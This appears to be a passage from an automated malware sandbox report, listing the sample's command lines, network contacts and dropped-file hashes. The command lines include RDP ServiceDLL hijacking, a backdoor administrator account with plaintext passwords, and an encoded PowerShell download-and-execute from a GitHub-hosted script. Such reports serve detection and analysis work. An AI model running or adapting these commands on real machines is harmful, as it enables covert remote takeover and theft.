C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bgcKKZ66 /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bgcKKZ66 /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66 /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bgcKKZ66
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bgcKKZ66
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
C:\Windows\system32\net.exe
net user wgautilacc 111213
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 111213
C:\Windows\system32\net.exe
net user wgautilacc /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc /active:yes
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 88.99.66.31:443 | iplogger.com | tcp |
| N/A | 8.8.8.8:53 | x1.c.lencr.org | udp |
| N/A | 104.73.131.204:80 | x1.c.lencr.org | tcp |
| N/A | 8.8.8.8:53 | loadexpert.info | udp |
| N/A | 45.139.184.124:80 | loadexpert.info | tcp |
| N/A | 8.8.8.8:53 | cookiebrokrash.info | udp |
| N/A | 45.139.184.124:80 | cookiebrokrash.info | tcp |
| N/A | 8.8.8.8:53 | www.binance.com | udp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 13.227.222.49:443 | www.binance.com | tcp |
| N/A | 13.227.222.49:443 | www.binance.com | tcp |
| N/A | 8.8.8.8:53 | accounts.binance.com | udp |
| N/A | 52.222.139.35:443 | accounts.binance.com | tcp |
| N/A | 52.222.139.35:443 | accounts.binance.com | tcp |
| N/A | 8.8.8.8:53 | bin.bnbstatic.com | udp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.43:443 | bin.bnbstatic.com | tcp |
| N/A | 8.8.8.8:53 | pki.goog | udp |
| N/A | 216.239.32.29:80 | pki.goog | tcp |
| N/A | 216.239.32.29:80 | pki.goog | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | lllwyerxedo.xyz | udp |
| N/A | 93.189.40.76:80 | lllwyerxedo.xyz | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 45.61.137.117:80 | 45.61.137.117 | tcp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | hitnaiguat.xyz | udp |
| N/A | 194.180.174.56:443 | hitnaiguat.xyz | tcp |
| N/A | 8.8.8.8:53 | ocsp.verisign.com | udp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
Files
memory/1652-60-0x0000000075561000-0x0000000075563000-memory.dmp
\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/1696-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/1696-65-0x0000000001050000-0x0000000001051000-memory.dmp
memory/1696-68-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
memory/1696-69-0x00000000009F0000-0x0000000000A11000-memory.dmp
\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/732-71-0x0000000000400000-0x000000000041E000-memory.dmp
memory/732-72-0x0000000000418E56-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/732-74-0x0000000000400000-0x000000000041E000-memory.dmp
\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
memory/944-77-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
memory/944-80-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
memory/1672-82-0x0000000000000000-mapping.dmp
memory/944-84-0x000000001B2F0000-0x000000001B2F2000-memory.dmp
memory/732-83-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/1688-85-0x0000000000000000-mapping.dmp
memory/944-86-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/1688-87-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
memory/1624-88-0x0000000000000000-mapping.dmp
memory/1328-89-0x0000000000000000-mapping.dmp
memory/268-90-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | efd4cdc71ae776f2eaae2f3499c9ad2b |
| SHA1 | 1d353a95489e8d6ddc66fe2451122fa153268206 |
| SHA256 | 39db60ad131b4855b5dbfb85f30df0a9fad0127918a281b16932471d614a89c8 |
| SHA512 | 128e54adf334ce387e5bce5513cdbef9c25607996928c9b1cf2136c4d9c584d6cecffc870470db5fa3017ab600f7f8eda3348b087138f4380376d0cfaed5833c |
memory/1696-92-0x0000000000000000-mapping.dmp
memory/1696-94-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/1696-95-0x000000001AC40000-0x000000001AC41000-memory.dmp
memory/1696-96-0x0000000002640000-0x0000000002641000-memory.dmp
memory/1696-97-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
memory/1696-98-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
memory/1696-99-0x0000000002670000-0x0000000002671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\sgyae4t\imagestore.dat
| MD5 | ed0a8d8e21e8567cb039620edf980198 |
| SHA1 | 473f77f2caf9bd9f77878e2e5b4e701a81cae15d |
| SHA256 | 21460327abba323c1487a0686de14d66065ff4ef3637415c8970af2d4c3f76a0 |
| SHA512 | 09bc090fc1272ab5f3b4a969b5f967ef3baf240fa4a88224f00175f25fd0b1cc56d36f1ce601f9f8a78045cafc3e3a2daaead79a13ee5c0ab463c39c1ce5316d |
memory/1696-101-0x000000001B750000-0x000000001B751000-memory.dmp
memory/1696-102-0x000000001AB00000-0x000000001AB01000-memory.dmp
memory/1696-103-0x0000000002740000-0x000000000274E000-memory.dmp
memory/560-104-0x0000000000400000-0x000000000041E000-memory.dmp
memory/560-105-0x0000000000418F66-mapping.dmp
memory/560-106-0x0000000000400000-0x000000000041E000-memory.dmp
memory/560-108-0x0000000001010000-0x0000000001011000-memory.dmp
\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/876-111-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
C:\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/876-113-0x00000000412C0000-0x00000000416E0000-memory.dmp
memory/876-116-0x0000000040E24000-0x0000000040E26000-memory.dmp
memory/876-118-0x0000000040E27000-0x0000000040E28000-memory.dmp
memory/876-117-0x0000000040E26000-0x0000000040E27000-memory.dmp
memory/876-115-0x0000000040E22000-0x0000000040E24000-memory.dmp
memory/940-119-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c45b6f6897dd66df41f87b75b5303cfd |
| SHA1 | 88e407b5b02982b9231831b6ffe0f538e17a39dd |
| SHA256 | 35fa1806f6be7067d8cf6b88c44927cb69f507f886a2819aa97e290df12f8a0c |
| SHA512 | 63e187aa04584fc3744dcf1743e529379307e490df2082cfade5fbc825933f6f2046d6500888852200229839aed945c27fac45e5cbde3582a6ac0da07ad1a8de |
memory/940-122-0x0000000002430000-0x0000000002431000-memory.dmp
memory/940-123-0x000000001AB10000-0x000000001AB11000-memory.dmp
memory/940-124-0x0000000002380000-0x0000000002381000-memory.dmp
memory/940-126-0x000000001AA94000-0x000000001AA96000-memory.dmp
memory/940-125-0x000000001AA90000-0x000000001AA92000-memory.dmp
memory/940-127-0x0000000002500000-0x0000000002501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | a595aec1979c62ceafa0eabdc5409ab5 |
| SHA1 | c3d3a223aac134bd7751eecd85858d9a019e233a |
| SHA256 | 036ee84d6066af194338302f602456179da3d28eb80ed6b38afd3dc2b71b230a |
| SHA512 | 3d8c8daf4a07583290517878112b94aee6df7f8121bdf90530b8a76937809a2dec658bd0874d4b01444747c70a80951b586650115c61fccee8a2c650ee9e1d11 |
memory/940-130-0x000000001B560000-0x000000001B561000-memory.dmp
memory/672-131-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.cmdline
| MD5 | d9728dc1e7caf965ad65923a7e3b11a6 |
| SHA1 | 47b91d70e21296b3b16caccba1bf04390c756110 |
| SHA256 | 3174bb103d1c568b1e1fc0d1af9a2f44123d3895a8f760d1f92277b870924ed4 |
| SHA512 | a8b18013be149af50ca82c4ce1a34ec40c52c04edb1681200ae557512b4c1e559c32c4289db1b66a0999579fc017324a4a90360e208684653ee9fad3bfba6691 |
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/912-134-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\li0ngda1\CSC68A5B573BB724897BDD73A04FCEFF5F.TMP
| MD5 | b64e5b5a610902efbbe195097329a5bf |
| SHA1 | 11ce01fab40f08594a5d65504816d27e09e1223e |
| SHA256 | 19d388e1663c72fda719712b03ea4cf19be7d75b47f4b2e7871039716c02903e |
| SHA512 | 6fd7a9bf996072c27c131ae137c864406aca6cbab74d9e774ca0db3c6c4080ba64b28613580a7ae445288b7adf3b19a8a913c24e984bc35afb07dea81fa6b25c |
C:\Users\Admin\AppData\Local\Temp\RES9656.tmp
| MD5 | 876a946870634ff64b462403507e985e |
| SHA1 | 98e62659c1fddec89f985d818f11b9fe4f375bf5 |
| SHA256 | 2915e03fdf7f7c3bc432e9aa4448a70b40a3b41f24ab97fde16c8e61c6d997c8 |
| SHA512 | 86a60c947a63d62573b4d33c563fca7c362304527bef452ef4ef8476e80313a7fcbdd826d42935f4d32dd0eb7738f1f12d8b1f7e2fc310c933163d600d75f47f |
C:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.dll
| MD5 | 5d3e9f2e89e58208dae437ce831ed5e8 |
| SHA1 | 39201fbf8c5ea8d70d6391b47d0cdb2ac932a74c |
| SHA256 | c64f1727beeeeea195792d4f3508d55245f69517ad78060f827c8db198b0cb4b |
| SHA512 | dc6818f389bdb4d31def9a3b6b7b24caff847f441bd5d664b965ec643a3b0b20940273aa87bd34d7395516218c0e466ffed7eaeb2906ff1e60211b17d5d178e7 |
memory/940-138-0x0000000002470000-0x0000000002471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 00fb904b2dd958760943b89400e9b7f9 |
| SHA1 | 8c825862b6f70cbaef991525f31100f713e61e7d |
| SHA256 | 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a |
| SHA512 | ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a |
memory/940-140-0x000000001B7C0000-0x000000001B7C1000-memory.dmp
memory/940-141-0x000000001B840000-0x000000001B841000-memory.dmp
memory/940-142-0x00000000025E0000-0x00000000025E1000-memory.dmp
memory/1664-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
memory/1664-148-0x000000001AC70000-0x000000001AC72000-memory.dmp
memory/1664-149-0x000000001AC74000-0x000000001AC76000-memory.dmp
memory/1664-151-0x0000000002440000-0x0000000002441000-memory.dmp
memory/1664-153-0x0000000002630000-0x0000000002631000-memory.dmp
memory/1664-155-0x000000001A950000-0x000000001A951000-memory.dmp
memory/1664-156-0x00000000025A0000-0x00000000025A1000-memory.dmp
memory/940-157-0x000000001AA9A000-0x000000001AAB9000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | fd45ebd976278f818280ca44c9776add |
| SHA1 | 2218dc4f6c86ac14359c578f9d96e670605e540c |
| SHA256 | c4475679f0a18589ea4744e0331cb353447247ebd3111cd97636e436b750eea9 |
| SHA512 | 3f3608229d2d458be2be5024a2ccad547396cff6eff9b78c8b691191123e4f926fef3aa3de0e3dd9e56143a92c47aa7179afb77a925c655121d049dd80c6d1b6 |
memory/1664-163-0x000000001B640000-0x000000001B641000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3687eb-0da9-4c9f-b15e-0837f5edd9fe
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/1664-176-0x000000001B5A0000-0x000000001B5A1000-memory.dmp
memory/1664-177-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
memory/1624-178-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
memory/1624-184-0x000000001AC10000-0x000000001AC12000-memory.dmp
memory/1624-185-0x000000001AC14000-0x000000001AC16000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 4ab9e29c553fbcd54d39495169e04662 |
| SHA1 | 43c42e9accbc4dfdb27aa9e0542053f154130dff |
| SHA256 | eb1260170f993c0ca27b7f772c7a7fa43fb4d321161caf426f820c74c60e5f9f |
| SHA512 | b1409fd87147c871890165ac24246cce42d23e890981deeae4c8f3087575c413ab4a0559530d04e29e66ebdc2d9ac9af970d7d4b3d79091dd2209cc65b4d1f6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5d589aa7-e946-4ee7-abaa-9615da7f3129
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_264bafee-bf30-4355-ad72-5bf7979cfc2a
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17a44acb-fe68-42f3-9cc3-d5bb8954976e
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_633570ee-6616-4526-b401-6145b5104372
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
